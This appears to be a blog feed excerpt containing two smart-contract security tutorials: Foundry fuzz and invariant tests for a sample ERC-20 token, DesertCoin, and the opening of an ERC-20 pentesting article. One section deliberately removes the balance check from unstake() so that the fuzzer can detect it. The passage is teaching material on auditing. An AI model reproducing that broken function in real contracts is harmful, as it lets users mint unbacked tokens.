This type of threat modeling helps us design better fuzzing tests. By brainstorming potential weaknesses, we can identify which areas deserve aggressive testing and ensure that our test cases reflect realistic attack scenarios.

## **Introducing Fuzzing: Breaking the Contract with Unexpected Inputs**

Now that we’ve thought like an attacker and considered potential threats, it’s time to apply fuzzing to stress-test the contract. Unlike unit tests, which check for specific inputs and expected outputs, fuzzing generates random or extreme values to test contract behavior under unpredictable conditions.

The goal of fuzzing is to break the contract—or at least find unexpected behaviors that developers might not have accounted for. This technique helps us uncover vulnerabilities such as:

-   **Integer overflows and underflows**
-   **Logic errors caused by edge cases**
-   **Unexpected reverts or unhandled failures**
-   **State inconsistencies when multiple users interact**
-   **Gas exhaustion vulnerabilities**

As auditors, we rarely receive fuzzing tests from developers, meaning it’s up to us to implement them ourselves. Depending on the type of contract we’re analyzing, we can define a set of fuzzing cases in advance to check for common vulnerabilities. For example, in ERC20-based tokens, we might want to test transfers, staking, and marketplace interactions under extreme conditions.
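
The number of random inputs Foundry generates per fuzz test is configurable in `foundry.toml`. A minimal fragment (the values shown are illustrative, not taken from the DesertCoin project; the defaults differ):

```toml
[fuzz]
runs = 1000              # inputs generated per fuzz test (the default is 256)
max_test_rejects = 65536 # how many vm.assume rejections to tolerate before failing
```

Raising `runs` increases the chance of hitting a rare edge case, at the cost of longer test times.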

To illustrate how we can implement fuzzing, let’s walk through a series of examples using Foundry.

&lt;details&gt;
&lt;summary&gt;Fuzzing testing of DesertCoin&lt;/summary&gt;

```solidity
import &quot;forge-std/Test.sol&quot;;
import &quot;../src/DesertCoin.sol&quot;;

contract DesertCoinFuzzTest is Test {
    DesertCoin desertCoin;
    address owner = address(1);
    address user1 = address(2);
    address user2 = address(3);

    uint256 initialSupply = 1_000_000 ether;

    function setUp() public {
        vm.startPrank(owner);
        desertCoin = new DesertCoin(initialSupply);
        desertCoin.transfer(user1, 1000 ether);
        vm.stopPrank();
    }

    /** Fuzz test for trade() */
    function testFuzzTrade(uint256 amount) public {
        vm.assume(amount &gt; 0 &amp;&amp; amount &lt;= 1000 ether);

        uint256 initialBalanceUser1 = desertCoin.balanceOf(user1);
        uint256 initialBalanceUser2 = desertCoin.balanceOf(user2);

        if (amount &lt;= initialBalanceUser1) {
            vm.prank(user1);
            desertCoin.trade(user2, amount);

            assertEq(desertCoin.balanceOf(user1), initialBalanceUser1 - amount);
            assertEq(desertCoin.balanceOf(user2), initialBalanceUser2 + amount);
        } else {
            vm.expectRevert(&quot;Insufficient balance&quot;);
            vm.prank(user1);
            desertCoin.trade(user2, amount);
        }
    }

    /** Fuzz test for stake() */
    function testFuzzStake(uint256 amount) public {
        vm.assume(amount &gt; 0 &amp;&amp; amount &lt;= 1000 ether);

        uint256 initialBalance = desertCoin.balanceOf(user1);

        if (amount &lt;= initialBalance) {
            vm.prank(user1);
            desertCoin.stake(amount);

            assertEq(desertCoin.stakedBalance(user1), amount);
            assertEq(desertCoin.balanceOf(user1), initialBalance - amount);
        } else {
            vm.expectRevert(&quot;Insufficient DSC&quot;);
            vm.prank(user1);
            desertCoin.stake(amount);
        }
    }

    /** Fuzz test for unstake() */
    function testFuzzUnstake(uint256 amount) public {
        vm.assume(amount &gt; 0 &amp;&amp; amount &lt;= 1000 ether);

        vm.prank(user1);
        desertCoin.stake(500 ether);

        uint256 initialStaked = desertCoin.stakedBalance(user1);
        uint256 initialBalance = desertCoin.balanceOf(user1);

        if (amount &lt;= initialStaked) {
            vm.prank(user1);
            desertCoin.unstake(amount);

            assertEq(desertCoin.stakedBalance(user1), initialStaked - amount);
            assertEq(desertCoin.balanceOf(user1), initialBalance + amount);
        } else {
            vm.expectRevert(&quot;Not enough staked&quot;);
            vm.prank(user1);
            desertCoin.unstake(amount);
        }
    }

    /** Fuzz test for buyItem() */
    function testFuzzBuyItem(uint256 price) public {
        vm.assume(price &gt; 0 &amp;&amp; price &lt;= 1000 ether);

        vm.prank(owner);
        desertCoin.setItemPrice(1, price);

        uint256 initialBalance = desertCoin.balanceOf(user1);

        if (price &lt;= initialBalance) {
            vm.prank(user1);
            desertCoin.buyItem(1);

            assertTrue(desertCoin.purchasedItems(user1, 1));
            assertEq(desertCoin.balanceOf(user1), initialBalance - price);
        } else {
            vm.expectRevert(&quot;Not enough DSC&quot;);
            vm.prank(user1);
            desertCoin.buyItem(1);
        }
    }

    /** Fuzz test for setItemPrice() */
    function testFuzzSetItemPrice(uint256 price) public {
        vm.assume(price &gt; 0 &amp;&amp; price &lt;= 1000 ether);

        vm.prank(owner);
        desertCoin.setItemPrice(1, price);

        assertEq(desertCoin.itemPrices(1), price);
    }

    function testFailFuzzSetItemPriceByNonOwner(uint256 price) public {
        vm.assume(price &gt; 0 &amp;&amp; price &lt;= 1000 ether);

        vm.prank(user1);
        desertCoin.setItemPrice(1, price); // Should fail
    }
}

```
&lt;/details&gt;


### **Fuzzing the Trade Function**

Transfers between users are one of the most common operations in ERC20-based contracts. If not properly tested, they can be exploited to manipulate balances, bypass restrictions, or trigger unintended behaviors. To ensure the reliability of transfers, it&apos;s important to test various scenarios. This includes verifying that random trade amounts work correctly for any valid input, ensuring that users cannot send more tokens than they own to prevent negative balances, and confirming that zero-value transfers don’t break contract logic. Additionally, handling extreme values, such as the maximum `uint256`, helps uncover potential overflow issues that could lead to unexpected contract behavior.

```solidity
function testFuzzTrade(uint256 amount) public {
    vm.assume(amount &gt; 0 &amp;&amp; amount &lt;= 1000 ether);

    uint256 initialBalanceUser1 = desertCoin.balanceOf(user1);
    uint256 initialBalanceUser2 = desertCoin.balanceOf(user2);

    if (amount &lt;= initialBalanceUser1) {
        vm.prank(user1);
        desertCoin.trade(user2, amount);

        assertEq(desertCoin.balanceOf(user1), initialBalanceUser1 - amount);
        assertEq(desertCoin.balanceOf(user2), initialBalanceUser2 + amount);
    } else {
        vm.expectRevert(&quot;Insufficient balance&quot;);
        vm.prank(user1);
        desertCoin.trade(user2, amount);
    }
}

```

### **Fuzzing the Staking Mechanism**

Staking requires burning tokens, so miscalculations could lead to lost funds or negative balances. To ensure proper functionality, it&apos;s crucial to test different stake amounts, verifying that balance updates are correctly tracked. Users should not be able to stake more than they own, preventing unintended losses. Additionally, testing extreme values like `0` or `MAX_UINT256` helps identify unexpected behaviors that could compromise the contract&apos;s integrity.

```solidity
function testFuzzStake(uint256 amount) public {
    vm.assume(amount &gt; 0 &amp;&amp; amount &lt;= 1000 ether);

    uint256 initialBalance = desertCoin.balanceOf(user1);

    if (amount &lt;= initialBalance) {
        vm.prank(user1);
        desertCoin.stake(amount);

        assertEq(desertCoin.stakedBalance(user1), amount);
        assertEq(desertCoin.balanceOf(user1), initialBalance - amount);
    } else {
        vm.expectRevert(&quot;Insufficient DSC&quot;);
        vm.prank(user1);
        desertCoin.stake(amount);
    }
}

```

### Fuzzing the Unstaking Function

Users should only be able to unstake the amount they have actually staked. If not properly enforced, this could lead to fund inflation or unauthorized withdrawals. To ensure correct behavior, testing should cover various unstake amounts, verifying that users cannot withdraw more than their staked balance. Additionally, it&apos;s important to confirm that balances update correctly after unstaking and to test multiple sequential unstake calls to detect potential inconsistencies.

```solidity
function testFuzzUnstake(uint256 amount) public {
    vm.assume(amount &gt; 0 &amp;&amp; amount &lt;= 1000 ether);

    vm.prank(user1);
    desertCoin.stake(500 ether);

    uint256 initialStaked = desertCoin.stakedBalance(user1);
    uint256 initialBalance = desertCoin.balanceOf(user1);

    if (amount &lt;= initialStaked) {
        vm.prank(user1);
        desertCoin.unstake(amount);

        assertEq(desertCoin.stakedBalance(user1), initialStaked - amount);
        assertEq(desertCoin.balanceOf(user1), initialBalance + amount);
    } else {
        vm.expectRevert(&quot;Not enough staked&quot;);
        vm.prank(user1);
        desertCoin.unstake(amount);
    }
}

```

### **Fuzzing the Buy Item Function**

Buying in-game items with DesertCoin requires accurate balance checks. Miscalculations could allow users to obtain items for free, spend negative amounts due to unchecked math, or disrupt the in-game economy. Testing should include a range of item prices to ensure flexibility, verifying that users cannot purchase items without sufficient balance. It’s also crucial to handle edge cases, such as zero-price items or unusually large values, to prevent unintended behaviors.

```solidity
function testFuzzBuyItem(uint256 price) public {
    vm.assume(price &gt; 0 &amp;&amp; price &lt;= 1000 ether);

    vm.prank(owner);
    desertCoin.setItemPrice(1, price);

    uint256 initialBalance = desertCoin.balanceOf(user1);

    if (price &lt;= initialBalance) {
        vm.prank(user1);
        desertCoin.buyItem(1);

        assertTrue(desertCoin.purchasedItems(user1, 1));
        assertEq(desertCoin.balanceOf(user1), initialBalance - price);
    } else {
        vm.expectRevert(&quot;Not enough DSC&quot;);
        vm.prank(user1);
        desertCoin.buyItem(1);
    }
}

```

### Running the Tests

Now that we have implemented fuzzing tests for key functions in `DesertCoin`, let&apos;s see how we can execute them and analyze the results. We&apos;ll demonstrate how fuzzing initially passes all tests, and then, after introducing a bug in `unstake()`, the test suite detects the issue.

Initially, we run the fuzzing tests without modifying the contract:

```bash
forge test --match-path test/DesertCoinFuzzing.t.sol

```

The output confirms that all fuzzing tests pass successfully:

![](/content/images/2025/03/image-4.png)

To simulate a real-world vulnerability, we modify the unstake function to remove the balance check:

```solidity
function unstake(uint256 amount) public {
        //require(stakedBalance[msg.sender] &gt;= amount, &quot;Not enough staked&quot;);

        _mint(msg.sender, amount);
        stakedBalance[msg.sender] -= amount;
        emit TokensUnstaked(msg.sender, amount);
    }

```

This allows users to unstake more tokens than they actually staked, effectively creating free tokens out of thin air.

Now, we rerun the same fuzzing tests:

```bash
forge test --match-path test/DesertCoinFuzzing.t.sol

```

This time, the fuzzer detects an issue in `testFuzzUnstake()`:

![](/content/images/2025/03/image-2.png)

The test fails because the function allows negative staked balances, triggering an arithmetic underflow.

## **Invariant Testing: Ensuring Smart Contract Stability Over Time**

Traditional unit tests focus on individual function calls, verifying expected inputs and outputs. However, smart contracts often experience unpredictable interactions, where users call functions in varying sequences. Invariant testing ensures that a contract’s fundamental properties always hold, regardless of how functions are executed.

Foundry automates this process by randomly selecting and executing contract functions with fuzzed inputs, simulating real-world usage. After each call, it checks whether the contract still satisfies predefined invariants—such as token supply consistency, balance integrity, or state transitions. If an invariant breaks, Foundry halts the test and provides a detailed trace, making it easy to pinpoint vulnerabilities.
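
How aggressively Foundry exercises the contract is controlled in `foundry.toml`. A sketch with illustrative values (the keys come from the Foundry invariant settings; tune them to your audit):

```toml
[invariant]
runs = 256             # number of independent fuzzing campaigns
depth = 100            # random calls made in each campaign
fail_on_revert = false # whether a reverting random call fails the test
```

Deeper runs surface bugs that only appear after long call sequences, so it is worth raising `depth` for stateful contracts like DesertCoin.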

Unlike standard tests that examine isolated cases, invariant testing runs hundreds or thousands of transactions in a single test, exposing subtle bugs that emerge over time. This makes it an essential tool for smart contract security, especially in financial protocols where stability and consistency are critical. Let&apos;s see some examples:

&lt;details&gt;
&lt;summary&gt;Invariant Testing DesertCoin&lt;/summary&gt;

```solidity
pragma solidity ^0.8.19;

import &quot;forge-std/Test.sol&quot;;
import &quot;forge-std/StdInvariant.sol&quot;;
import &quot;../src/DesertCoin.sol&quot;;

contract DesertCoinInvariantTest is StdInvariant, Test {
    DesertCoin desertCoin;
    address owner = address(1);
    address user1 = address(2);
    address user2 = address(3);

    uint256 initialSupply = 1_000_000 ether;

    function setUp() public {
        vm.startPrank(owner);
        desertCoin = new DesertCoin(initialSupply);
        desertCoin.transfer(user1, 1000 ether);
        desertCoin.transfer(user2, 1000 ether);
        vm.stopPrank();

        // Register contract for invariant testing
        targetContract(address(desertCoin));
    }

    function invariant_totalSupplyConstant() public {
        assertEq(desertCoin.totalSupply(), initialSupply);
    }

    function invariant_tradeDoesNotDestroyTokens() public {
        address sender = user1;
        address recipient = user2;
        uint256 tradeAmount = 10 ether;

        uint256 balanceSenderBefore = desertCoin.balanceOf(sender);
        uint256 balanceRecipientBefore = desertCoin.balanceOf(recipient);
        uint256 totalSupplyBefore = desertCoin.totalSupply();

        if (balanceSenderBefore &gt;= tradeAmount) {
            vm.prank(sender);
            desertCoin.trade(recipient, tradeAmount);
        }

        uint256 balanceSenderAfter = desertCoin.balanceOf(sender);
        uint256 balanceRecipientAfter = desertCoin.balanceOf(recipient);
        uint256 totalSupplyAfter = desertCoin.totalSupply();

        assertEq(
            balanceSenderBefore + balanceRecipientBefore,
            balanceSenderAfter + balanceRecipientAfter
        );
        assertEq(totalSupplyBefore, totalSupplyAfter);
    }

    function invariant_stakedBalanceCorrect() public {
        address staker = user1;
        uint256 stakeAmount = 10 ether;

        uint256 balanceBefore = desertCoin.balanceOf(staker);
        uint256 stakedBefore = desertCoin.stakedBalance(staker);
        uint256 totalSupplyBefore = desertCoin.totalSupply();

        if (balanceBefore &gt;= stakeAmount) {
            vm.prank(staker);
            desertCoin.stake(stakeAmount);
        }

        uint256 balanceAfter = desertCoin.balanceOf(staker);
        uint256 stakedAfter = desertCoin.stakedBalance(staker);
        uint256 totalSupplyAfter = desertCoin.totalSupply();

        assertEq(balanceBefore - balanceAfter, stakedAfter - stakedBefore);
        assertEq(totalSupplyBefore, totalSupplyAfter);
    }

    function invariant_validItemPurchases() public {
        uint256 itemId = 1;
        uint256 itemPrice = 50 ether;

        // Owner sets the item price
        vm.prank(owner);
        desertCoin.setItemPrice(itemId, itemPrice);

        uint256 balanceBefore = desertCoin.balanceOf(user1);

        if (balanceBefore &gt;= itemPrice) {
            vm.prank(user1);
            desertCoin.buyItem(itemId);
        } else {
            vm.expectRevert(&quot;Not enough DSC&quot;);
            vm.prank(user1);
            desertCoin.buyItem(itemId);
        }

        uint256 balanceAfter = desertCoin.balanceOf(user1);
        assertLe(balanceAfter, balanceBefore);
    }


    function invariant_cannotUnstakeMoreThanStaked() public {
        address staker = user1;
        uint256 unstakeAmount = 20 ether;

        uint256 stakedBalanceBefore = desertCoin.stakedBalance(staker);
        uint256 balanceBefore = desertCoin.balanceOf(staker);

        if (unstakeAmount &gt; stakedBalanceBefore) {
            vm.expectRevert(&quot;Not enough staked&quot;);
            vm.prank(staker);
            desertCoin.unstake(unstakeAmount);
        } else {
            vm.prank(staker);
            desertCoin.unstake(unstakeAmount);
        }

        uint256 stakedBalanceAfter = desertCoin.stakedBalance(staker);
        uint256 balanceAfter = desertCoin.balanceOf(staker);

        assertLe(stakedBalanceAfter, stakedBalanceBefore);
        assertGe(balanceAfter, balanceBefore);
    }
}

```
&lt;/details&gt;


### Total Supply Must Remain Constant

```solidity
function invariant_totalSupplyConstant() public {
    assertEq(desertCoin.totalSupply(), initialSupply);
}

```

This test enforces the most fundamental property of a token: the total supply must remain unchanged unless explicitly modified by an authorized mechanism. No function in the contract should accidentally mint or burn tokens, ensuring that no unexpected inflation or deflation occurs.

### **Token Transfers Do Not Destroy Tokens**

```solidity
function invariant_tradeDoesNotDestroyTokens() public {
    // Simulates a trade between two users
    address sender = user1;
    address recipient = user2;
    uint256 tradeAmount = 10 ether;

    uint256 balanceSenderBefore = desertCoin.balanceOf(sender);
    uint256 balanceRecipientBefore = desertCoin.balanceOf(recipient);
    uint256 totalSupplyBefore = desertCoin.totalSupply();

    if (balanceSenderBefore &gt;= tradeAmount) {
        vm.prank(sender);
        desertCoin.trade(recipient, tradeAmount);
    }

    uint256 balanceSenderAfter = desertCoin.balanceOf(sender);
    uint256 balanceRecipientAfter = desertCoin.balanceOf(recipient);
    uint256 totalSupplyAfter = desertCoin.totalSupply();

    // Ensure no tokens were destroyed or created during a trade
    assertEq(balanceSenderBefore + balanceRecipientBefore, balanceSenderAfter + balanceRecipientAfter);
    assertEq(totalSupplyBefore, totalSupplyAfter);
}

```

A trade operation should only redistribute tokens between users without affecting the total supply. This test ensures that transfers are lossless and that token balances adjust correctly after each transaction.

### **Staked Balance Integrity**

```solidity
function invariant_stakedBalanceCorrect() public {
    address staker = user1;
    uint256 stakeAmount = 10 ether;

    uint256 balanceBefore = desertCoin.balanceOf(staker);
    uint256 stakedBefore = desertCoin.stakedBalance(staker);
    uint256 totalSupplyBefore = desertCoin.totalSupply();

    if (balanceBefore &gt;= stakeAmount) {
        vm.prank(staker);
        desertCoin.stake(stakeAmount);
    }

    uint256 balanceAfter = desertCoin.balanceOf(staker);
    uint256 stakedAfter = desertCoin.stakedBalance(staker);
    uint256 totalSupplyAfter = desertCoin.totalSupply();

    // Ensure the amount staked matches the amount removed from the balance
    assertEq(balanceBefore - balanceAfter, stakedAfter - stakedBefore);
    assertEq(totalSupplyBefore, totalSupplyAfter);
}

```

When users stake tokens, their balance should decrease while their staked balance increases by the same amount. This test ensures that the contract correctly accounts for all staked tokens, preventing inconsistencies in the staking logic.

### **Only Valid Item Purchases Are Allowed**

```solidity
function invariant_validItemPurchases() public {
    uint256 itemId = 1;
    uint256 itemPrice = 50 ether;

    // Owner sets the item price
    vm.prank(owner);
    desertCoin.setItemPrice(itemId, itemPrice);

    uint256 balanceBefore = desertCoin.balanceOf(user1);

    if (balanceBefore &gt;= itemPrice) {
        vm.prank(user1);
        desertCoin.buyItem(itemId);
    } else {
        vm.expectRevert(&quot;Not enough DSC&quot;);
        vm.prank(user1);
        desertCoin.buyItem(itemId);
    }

    uint256 balanceAfter = desertCoin.balanceOf(user1);

    // Ensure no illegal transactions occur
    assertLe(balanceAfter, balanceBefore);
}

```

Users should only be able to purchase items if they have enough funds. This test prevents unintended purchases and ensures that users cannot buy items without sufficient balance. If the purchase is invalid, the transaction should revert properly, maintaining contract security.

### **Users Can’t Unstake More Than They Staked**

```solidity
function invariant_cannotUnstakeMoreThanStaked() public {
    address staker = user1;
    uint256 unstakeAmount = 20 ether;

    uint256 stakedBalanceBefore = desertCoin.stakedBalance(staker);
    uint256 balanceBefore = desertCoin.balanceOf(staker);

    if (unstakeAmount &gt; stakedBalanceBefore) {
        vm.expectRevert(&quot;Not enough staked&quot;);
        vm.prank(staker);
        desertCoin.unstake(unstakeAmount);
    } else {
        vm.prank(staker);
        desertCoin.unstake(unstakeAmount);
    }

    uint256 stakedBalanceAfter = desertCoin.stakedBalance(staker);
    uint256 balanceAfter = desertCoin.balanceOf(staker);

    // Ensure users can&apos;t unstake more than they actually staked
    assertLe(stakedBalanceAfter, stakedBalanceBefore);
    assertGe(balanceAfter, balanceBefore);
}

```

Staking only works if users can properly withdraw their staked funds—but they should never be able to unstake more than they originally staked. This test ensures unstaking logic remains correct, preventing unintended balance manipulation.

### Running the Tests

If we execute our invariant tests, we immediately notice a failure in `invariant_stakedBalanceCorrect`.

![](/content/images/2025/03/image-5.png)

The error occurs because the total supply changes when staking and unstaking due to the use of `_burn` and `_mint`. This violates the invariant that the total token supply should remain constant unless explicitly modified by the contract logic.

Since staking is just locking tokens, burning and minting aren’t strictly necessary. Instead, we can transfer tokens to the contract and back. This approach ensures that the total supply remains unchanged while still enforcing staking logic.

However, it&apos;s important to note that this is just one possible implementation. Some protocols prefer using `_burn` and `_mint` for staking mechanisms to prevent potential reentrancy issues, avoid token accumulation in the contract, and ensure compatibility with standards like ERC-4626. While transferring tokens directly to the contract can simplify tracking and reduce supply fluctuations, it may introduce security risks if not properly managed. Choosing between these approaches depends on the specific needs and security considerations of the protocol.

```solidity
    /**  Block the tokens for staking */
    function stake(uint256 amount) public {
        require(balanceOf(msg.sender) &gt;= amount, &quot;Insufficient DSC&quot;);

        //_burn(msg.sender, amount);
        _transfer(msg.sender, address(this), amount);
        stakedBalance[msg.sender] += amount;
        emit TokensStaked(msg.sender, amount);
    }

    function unstake(uint256 amount) public {
        require(stakedBalance[msg.sender] &gt;= amount, &quot;Not enough staked&quot;);

        //_mint(msg.sender, amount);
        stakedBalance[msg.sender] -= amount;
        _transfer(address(this), msg.sender, amount); 
        emit TokensUnstaked(msg.sender, amount);
    }

```

With this correction, we execute the invariant tests again:

![](/content/images/2025/03/image-6.png)

Now, `invariant_stakedBalanceCorrect` passes successfully, confirming that the total token supply remains unchanged while still enforcing correct staking behavior.

# Conclusions

In this chapter, we explored **unit testing, fuzzing, and invariant testing** to identify and mitigate vulnerabilities in smart contracts.

-   **Unit testing** ensures functions behave as expected under controlled conditions.
-   **Fuzzing** exposes hidden edge cases and unexpected failures.
-   **Invariant testing** verifies that core contract properties remain intact across multiple transactions.

Effective testing is key to securing smart contracts. Combining these methods enhances reliability and helps catch potential flaws before deployment.

# References

-   Foundry Documentation. &quot;Foundry Book: A Guide to Smart Contract Development &amp; Testing.&quot; Available at: [https://book.getfoundry.sh/](https://book.getfoundry.sh/)
-   OpenZeppelin Documentation. &quot;ERC20: Standard Token Implementation.&quot; Available at: [https://docs.openzeppelin.com/contracts/4.x/api/token/erc20](https://docs.openzeppelin.com/contracts/4.x/api/token/erc20)
-   Solidity Documentation. &quot;Solidity 0.8.x Breaking Changes.&quot; Available at: [https://docs.soliditylang.org/en/latest/080-breaking-changes.html](https://docs.soliditylang.org/en/latest/080-breaking-changes.html)</content:encoded><author>Ruben Santos</author></item><item><title>Hacking ERC-20: Pentesting the Most Common Ethereum Token Standard</title><link>https://www.kayssel.com/post/web3-14</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-14</guid><description>ERC-20 tokens power Ethereum, but poor implementations can be riddled with vulnerabilities. From integer overflows to reentrancy and front-running attacks, pentesters must scrutinize contracts. This chapter explores key flaws, exploits, and Foundry-based testing to break and secure ERC-20 tokens. 🚀</description><pubDate>Sun, 02 Mar 2025 10:07:31 GMT</pubDate><content:encoded># **Pentesting ERC-20 Tokens: How Secure Are They Really?**

ERC-20 tokens are everywhere. They power DeFi, fuel governance models, and sometimes, let’s be honest, exist purely as **glorified meme coins**. Whether it’s **USDT, LINK, or some random token airdropped into your wallet that you’re too scared to click on**, ERC-20 is the standard that defines how fungible tokens work on Ethereum.

But here’s the thing—**not all ERC-20 implementations are created equal**. A poorly written contract can be **a ticking time bomb**, just waiting for someone to exploit it. **Front-running attacks, integer overflows, reentrancy bugs, and minting vulnerabilities** are just a few of the common security flaws lurking in ERC-20 tokens. And as a pentester, these are exactly the kinds of weaknesses you should be hunting for.

In this article, we’ll break down ERC-20 security **from an offensive perspective**. We’ll go beyond the basics, looking at **common vulnerabilities, real-world exploits, and practical testing techniques using Foundry**. By the end, you’ll not only understand how ERC-20 tokens work—you’ll know how to **break them, fix them, and make sure they’re battle-tested against attacks**.

So, if you’re ready to **hack some smart contracts** (ethically, of course), let’s get started. 🚀💀

# What is an ERC-20 Token?

ERC-20 is a technical standard that defines how fungible tokens should behave on the Ethereum network. Think of it as a rulebook for developers to create tokens that can seamlessly interact with wallets, exchanges, and other smart contracts. It&apos;s like having a universal charger for all your devices—no compatibility headaches.

The standard includes essential functions like checking balances, transferring tokens, and approving spending. For example, when you send USDT from one wallet to another, it’s the ERC-20 standard that ensures the process works the same way across the entire Ethereum ecosystem.

Why does it matter? Because it simplifies everything. Developers can build without reinventing the wheel, and users can trust that their tokens will work across platforms without issues. It’s one of the main reasons Ethereum became the go-to blockchain for decentralized applications (dApps) and Initial Coin Offerings (ICOs) back in the day.

To better understand how ERC-20 works under the hood, let’s break down the core functions that every compliant token must implement. These aren’t just technicalities—they’re the foundation that ensures your token can move, be tracked, and interact with the Ethereum ecosystem safely and efficiently.

# Core Functions of an ERC-20 Token

Now that we know what an ERC-20 token is, let’s look at what actually makes one tick. Every ERC-20 token follows a set of mandatory and optional functions that define how it behaves on the Ethereum blockchain. Without these, a token wouldn’t be able to interact with wallets, exchanges, or even other smart contracts.

Here’s a breakdown of the key functions:

#### 🧮 1. `totalSupply`

This function returns the total amount of tokens that exist for a particular contract. It’s like checking how many coins were minted in total. This supply can be fixed or dynamic, depending on the token&apos;s design.

```solidity
function totalSupply() public view returns (uint256);

```

#### 💰 2. `balanceOf`

If you’ve ever wondered how your wallet knows how many tokens you own, this is the function behind it. It returns the balance of a specific address.

```solidity
function balanceOf(address account) public view returns (uint256);

```

#### 🔄 3. `transfer`

This function allows a user to send tokens from their address to another. It’s the bread and butter of any token transaction.

```solidity
function transfer(address recipient, uint256 amount) public returns (bool);

```

If the transfer succeeds, it returns `true`. Most implementations revert on failure, though the standard technically allows returning `false`, which is why callers should check the return value. Simple, but essential.

#### ✅ 4. `approve`

Imagine lending your friend some money but only allowing them to spend a certain amount. That’s what `approve` does. It allows an address to spend tokens on behalf of the owner, but only up to a specific limit.

```solidity
function approve(address spender, uint256 amount) public returns (bool);

```

This is particularly useful for decentralized exchanges (DEXs), where you approve the exchange to handle your tokens without giving full control.

#### 🔁 5. `transferFrom`

Once an address has approval to spend tokens, `transferFrom` is the function that actually moves them. It’s how smart contracts execute transactions on behalf of users.

```solidity
function transferFrom(address sender, address recipient, uint256 amount) public returns (bool);

```

Think of it like a subscription service automatically charging your card—except here, it&apos;s tokens being moved after prior approval.

#### 📏 6. `allowance`

This function checks how many tokens an address is allowed to spend on behalf of another. It’s like asking, _&quot;How much has the owner authorized for me to use?&quot;_

```solidity
function allowance(address owner, address spender) public view returns (uint256);

```

&lt;details&gt;
&lt;summary&gt;A typical ERC20 workflow is as follows:&lt;/summary&gt;

```mermaid
sequenceDiagram
    participant UserA as User A
    participant UserB as User B
    participant Contract as ERC-20 Contract

    %% Balance query
    UserA-&gt;&gt;Contract: balanceOf(A)
    Contract--&gt;&gt;UserA: Returns Balance

    %% Spending approval
    UserA-&gt;&gt;Contract: approve(B, 100 tokens)
    Contract-&gt;&gt;Contract: Set Allowance (A → B: 100)

    %% Direct transfer
    UserA-&gt;&gt;Contract: transfer(B, 50 tokens)
    Contract-&gt;&gt;Contract: Update balances
    Contract-&gt;&gt;UserB: Emit Transfer Event

    %% Transfer via approval
    UserB-&gt;&gt;Contract: transferFrom(A, B, 50 tokens)
    Contract-&gt;&gt;Contract: Check &amp; Update Allowance
    Contract-&gt;&gt;UserB: Emit Transfer Event

```
&lt;/details&gt;


# Example of a Basic ERC-20 Contract

Now that we understand the core functions of an ERC-20 token, let’s look at a hands-on example. This is a simple contract for a token called **DesertCoin** with the symbol **DSC**. It shows how the standard functions work together to create a functional token.

Here’s the code:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract DesertCoin {
    string public name = &quot;DesertCoin&quot;;
    string public symbol = &quot;DSC&quot;;
    uint8 public decimals = 18;
    uint256 public totalSupply;

    mapping(address =&gt; uint256) public balanceOf;
    mapping(address =&gt; mapping(address =&gt; uint256)) public allowance;

    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);

    constructor(uint256 initialSupply) {
        totalSupply = initialSupply * (10 ** uint256(decimals));
        balanceOf[msg.sender] = totalSupply;
    }

    function transfer(address to, uint256 amount) public returns (bool) {
        require(to != address(0), &quot;Invalid address&quot;);
        require(balanceOf[msg.sender] &gt;= amount, &quot;Insufficient balance&quot;);

        balanceOf[msg.sender] -= amount;
        balanceOf[to] += amount;

        emit Transfer(msg.sender, to, amount);
        return true;
    }

    function approve(address spender, uint256 amount) public returns (bool) {
        require(spender != address(0), &quot;Invalid address&quot;);

        allowance[msg.sender][spender] = amount;
        emit Approval(msg.sender, spender, amount);
        return true;
    }

    function transferFrom(address from, address to, uint256 amount) public returns (bool) {
        require(to != address(0), &quot;Invalid address&quot;);
        require(balanceOf[from] &gt;= amount, &quot;Insufficient balance&quot;);
        require(allowance[from][msg.sender] &gt;= amount, &quot;Allowance exceeded&quot;);

        balanceOf[from] -= amount;
        balanceOf[to] += amount;
        allowance[from][msg.sender] -= amount;

        emit Transfer(from, to, amount);
        return true;
    }
}

```

This contract defines an **ERC-20 token from scratch**, implementing the core functionality needed for transfers, approvals, and ownership tracking. Let’s break it down at a high level.

The contract starts by defining the **token’s basic properties**, including its name (`DesertCoin`), symbol (`DSC`), and number of decimal places (`18`), which is the standard for most ERC-20 tokens. The `totalSupply` variable keeps track of the total amount of tokens that exist.

Each **Ethereum address has a balance**, stored in the `balanceOf` mapping. Another mapping, `allowance`, is used to track approvals—this allows users to grant permission to others to spend tokens on their behalf.

When the contract is deployed, the **constructor** initializes the token by minting the entire supply to the deployer&apos;s address. The initial supply is multiplied by `10^18` to adjust for the decimals, ensuring that token values are represented correctly.

The `transfer()` function enables users to **send tokens to another address**. It first checks that the sender has enough tokens and that the recipient address is valid. If these conditions are met, it deducts the amount from the sender’s balance and adds it to the recipient’s. It then emits a `Transfer` event, which external applications (like wallets and block explorers) can use to track token movements.

The `approve()` function allows a user to **authorize another address to spend a certain amount of tokens on their behalf**. This is useful for interactions with smart contracts, such as decentralized exchanges (DEXs), where users don’t send tokens directly but instead approve a contract to manage them. When an approval is made, an `Approval` event is emitted.

The `transferFrom()` function is used when a third party (such as a smart contract) **moves tokens on behalf of someone else**. It checks if the sender has enough balance and if the transaction respects the approved allowance. If valid, it performs the transfer and updates the allowance accordingly.
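To make this concrete, here is a minimal Foundry unit-test sketch for the contract above. The file path `src/DesertCoin.sol` and the test names are assumptions; the assertions only exercise behavior the contract actually implements:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;forge-std/Test.sol&quot;;
import {DesertCoin} from &quot;../src/DesertCoin.sol&quot;;

contract DesertCoinTest is Test {
    DesertCoin token;
    address alice = address(0xA11CE);
    address bob = address(0xB0B);

    function setUp() public {
        token = new DesertCoin(1000); // deployer receives 1000 * 10^18 DSC
    }

    function test_TransferMovesBalance() public {
        token.transfer(alice, 100 ether);
        assertEq(token.balanceOf(alice), 100 ether);
    }

    function test_TransferFromConsumesAllowance() public {
        token.approve(bob, 50 ether);
        vm.prank(bob);
        token.transferFrom(address(this), alice, 50 ether);
        assertEq(token.allowance(address(this), bob), 0);
    }

    function test_RevertWhen_BalanceInsufficient() public {
        // alice holds nothing, so this must hit the balance require()
        vm.prank(alice);
        vm.expectRevert(&quot;Insufficient balance&quot;);
        token.transfer(bob, 1);
    }
}
```

Note that `100 ether` is just shorthand for `100 * 10**18`, which matches the token&apos;s 18 decimals.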

